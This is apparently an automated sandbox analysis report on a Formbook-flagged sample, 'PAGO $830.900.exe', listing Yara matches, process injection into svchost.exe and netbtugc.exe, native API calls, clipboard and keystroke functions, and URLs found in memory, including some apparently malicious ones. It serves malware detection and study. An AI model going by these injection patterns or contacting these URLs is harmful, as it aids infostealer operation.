            Source: netbtugc.exe, 00000004.00000002.4481211759.0000000004C30000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.00000000035A0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000045E8000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000002F58000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2631846308.0000000011598000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle
            Source: netbtugc.exe, 00000004.00000002.4481211759.0000000004C30000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.00000000035A0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.gandi.net/en/domain
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.htmlit.com.cn/
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.zblogcn.com/
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DEEA26 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DEEC91 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DDA975 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00E09468 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: This is a third-party compiled AutoIt script.0_2_00D7445D
            Source: PAGO $830.900.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PAGO $830.900.exe, 00000000.00000000.2033213416.0000000000E32000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7b6f19a2-2
            Source: PAGO $830.900.exe, 00000000.00000000.2033213416.0000000000E32000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_660ef0c4-2
            Source: PAGO $830.900.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b2427842-b
            Source: PAGO $830.900.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_aa80c54a-5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C063 NtClose,2_2_0042C063
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B73090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B73010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B73D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B73D70 NtOpenThread
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03924340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03924650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039235C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039239B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03922C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03923090 NtSetValueKey
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03923010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03923D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03923D70 NtOpenThread
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02DA8E60 NtReadFile
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02DA8F50 NtDeleteFile
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02DA8CF0 NtCreateFile
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02DA9000 NtClose
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02DA9160 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00DDD588: CreateFileW,DeviceIoControl,CloseHandle
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00DD1145 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00DDE814 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00DD81EE
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D7E3F0
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00DAE4A0
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00DA66FB
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00E047A8
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D9CA30
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D7AB30
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D8ADFD
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00DA6D79
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D792A0
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D8D3B5
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D91324
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D91696
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D977AB
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D8B728
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D979DA
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D799D0
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D91940
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D91C07
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D97C37
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00DFBD6B
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D91EC2
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00DA9E8E
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00D8BEAD
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_00DE1F64
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: 0_2_013C2068
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418113
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040F9C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040F9BC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402209
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402210
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004162FE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004162BC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00416303
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040FBE3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040DC63
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402DC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042E653
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF41A2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE4420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE2F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDCD1F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B85630
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C095C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFF43F
